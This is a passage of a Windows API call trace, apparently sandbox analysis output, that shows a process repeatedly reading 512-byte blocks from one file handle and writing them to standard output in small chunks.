(_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.460] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.460] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 
[0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0209.462] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.462] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.463] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.463] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType 
(hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.465] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.465] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, 
lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, 
lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.466] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.466] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.468] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.468] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.469] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.469] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, 
